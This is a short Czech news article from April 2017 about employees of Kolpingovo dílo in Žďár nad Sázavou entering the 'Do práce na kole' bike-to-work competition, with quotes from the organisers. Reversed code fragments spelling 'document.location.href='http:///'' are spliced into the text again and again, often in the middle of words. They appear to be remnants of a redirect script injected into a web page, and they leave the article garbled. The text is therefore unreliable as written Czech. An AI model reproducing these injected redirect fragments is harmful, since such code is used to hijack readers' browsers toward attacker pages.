Rainbow page separator

Pracovníci Kolpingova díla usednou v květnu do sedel bicyklů

Úterý, 25. dubna 2017

Žďár nad Sázavou / Do sedmého ročníku akce Do práce na kole se od 1. května opět hodlají zapojit pracovníci žďárského Kolpingova díla ČR. V [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to ročníku se lidé mohou přidat i tehdy, pokud k dopravě do práce využívají také chůzi, běh, jízdu na koloběžce nebo jiný šetrný způsob dopravy. Do závodu se může přihlásit jednotlivec nebo dvou až pětičlenný tým. Pro účastníky jsou navíc nachystány ve Žďáře a okolí zajímavé akce a slevy. Informace jsou uvedeny na webu www.dopracenakole.cz.
Oficiálně se závodí v pravidelnosti a výkonnosti. Soutěž má stanovená pravidla, každý den se do webového rozhraní vkládá ujetá trasa a je možné používat i aplikaci pro pohyb ve městě.
„Neoficiální kategorie jsme zvolili spíše nevýkonnostně. Proběhne tak soutěž o největšího bahňáka, kde mají zřetelnou výhodu přespolní. Těšíme se na příspěvky do kategorie o nejzajímavější zážitek,“ uvedl koordiná[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tor soutěže v Kolpingově díle ČR Josef Soukal. „Někteří kolegové se ptají, zda má cenu se do soutěže hlásit, když mohou přeci jezdit jen tak, bez soutěže. V [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom mají jistě pravdu, ale z loňské premiéry vím, že zapojení do soutěže opravdu motivuje k omezení využívání au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobilu. A navíc jsme vloni díky zapojení vyhráli krásné ceny od města,“ dodala Barbora Augustýnová, vedoucí kontaktního a poradenského centra.